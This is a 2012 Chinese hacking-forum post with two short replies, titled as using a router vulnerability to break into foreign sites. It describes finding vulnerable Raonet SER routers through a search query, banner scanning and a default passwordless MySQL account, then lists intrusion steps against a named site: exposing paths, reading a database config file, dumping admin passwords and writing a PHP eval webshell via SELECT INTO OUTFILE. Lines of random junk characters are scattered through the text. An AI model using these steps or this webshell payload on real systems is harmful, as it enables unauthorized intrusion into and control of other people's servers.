找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3469|回复: 2
打印 上一主题 下一主题

利用某路由器漏洞入侵国外站点

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-10 10:30:18 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  寻找存在漏洞的路由器方法:
, f! ]$ J: g4 [% H0 u7 J# G! f7 U
! ^! }& {6 }# W, _2 h& X: j( z1:google搜索'Raonet Subscriber Ethernet Router'
+ {& W2 I! f; x' l7 `( b
$ S! r0 y3 y. @2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001( C/ _; v2 O4 k9 d) @

  b# A, U5 _. s$ q, j. V' N6 r, A: A* P3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
0 s; C' V' Z. e0 k+ q8 G
1 T3 L3 q6 Q# K( v1 l//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......! k( m9 L. O1 Z0 A0 O) C

+ c/ N! y  J4 F& t
" N! s! L5 K& {2 n  \+ ]6 g" P: Q% w: u. c
入侵步骤:5 g9 \; w7 \% C9 Y5 `
( ~7 R0 Z/ \2 e& ~1 H) O# x
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php
5 c, R, x/ m8 E- H& b
, L0 K0 _3 Z7 w0 I( P8 y. K2 `/ z2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc# r9 i- c: O  `) z) f+ f
3:得到密码后连接,查看GUI管理密码:' x- M8 M7 S1 z
use ser_500
3 `+ n1 p* ]/ jselect id,passwd from user;
; ~7 [* |7 ^5 S" [/ i$ n- v7 ]4:通过数据库写入webshell,执行命令:* I3 r' y9 j( ]2 Z. q9 d/ |( Q5 p9 m# S
use mysql;' T, L# @( Z7 n# I( }+ k! R
create table ok(cmd TEXT);
/ E1 Y  D, b) X! @, w6 ~) pinsert into ok values("<?php @eval($_POST[cmd])?>");
+ n% s/ N" k3 v! |8 j/ H6 W0 wselect * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
# C. J" u1 J; {" ^drop table ok;! Y3 {6 M5 ~4 u9 o: g

; i  a2 y, q3 w3 e& I! E) R5:连接后门shell.php + v6 A2 b+ c8 T1 P+ U7 n7 l% Z. E

+ T! z$ C! Q8 U8 G6. 搞定!
+ N! {6 Z/ O$ O5 ~! [( \
* Q6 Z% M' r& K- D! L& Y
回复

使用道具 举报

沙发
发表于 2013-7-27 20:06:50 | 只看该作者
这个后果可以很严重的说
回复 支持 反对

使用道具 举报

板凳
发表于 2013-7-29 12:07:54 | 只看该作者
不错哦,黑服务器补洞。。
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表